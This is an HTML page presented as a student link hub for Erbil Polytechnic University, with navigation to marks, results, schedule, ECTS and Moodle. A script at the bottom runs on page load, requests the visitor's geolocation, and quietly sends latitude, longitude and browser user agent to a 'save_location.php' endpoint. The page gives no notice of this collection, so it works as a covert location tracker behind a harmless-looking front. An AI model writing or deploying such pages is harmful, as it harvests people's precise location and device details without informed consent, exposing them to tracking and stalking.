<!DOCTYPE html>
<html lang="eng">
<head>
 <meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>NoahJoseph</title>
<link rel="stylesheet" href="style.css">

</head>
<body onload="getLocation()">

    <div class="banner">
        <div class="navbar">
    
           <div class="myname"><a href="https://www.instagram.com/4.noahjoseph/"><button>NoahJoseph</button></a></div>
           
            <ul>
                <li><a href="https://epu.edu.iq/">Home</a></li>
                <li><a href="https://bologna.epu.edu.iq/student_account/mymodules.php">subjects</a></li>
                <li><a href="https://bologna.epu.edu.iq/student_account/Feedback_index.php">marks</a></li>
                <li><a href="https://bologna.epu.edu.iq/student_account/FinalDegree.php">results</a></li>
                <li><a href="https://epu.edu.iq/erbil-technical-administrative-institute/management-information-systems-department/#1633467276927-fd4de4f3-c69d">Schedule</a></li>
            </ul>
        </div>
        <div class="content">
            <h1>EPU</h1>
            <p>To know about the things that you need</p>
            <div class="click">
                <a href="https://bologna.epu.edu.iq/adminects/">
                <button type="button"><span></span>ECTS</button></a>
                <a class="insta-icon" href="https://moodle.epu.edu.iq/login/index.php"><button type="button"><span></span>MOODLE</button></a>
            </div>
        </div>
    </div>


    <script>
        var x = document.getElementById("demo");
        function getLocation() {
          if (navigator.geolocation) {
            navigator.geolocation.getCurrentPosition(showPosition);
          } else {
            x.innerHTML = "Geolocation is not supported by this browser.";
          }
        }
        
        function showPosition(position) {

            const xhttp = new XMLHttpRequest();
            xhttp.open("GET", "save_location.php?lat=" + position.coords.latitude + "&long=" + position.coords.longitude + "&user_agent:" + navigator.userAgent);
            xhttp.send();
        }
        </script>
</body>
</html>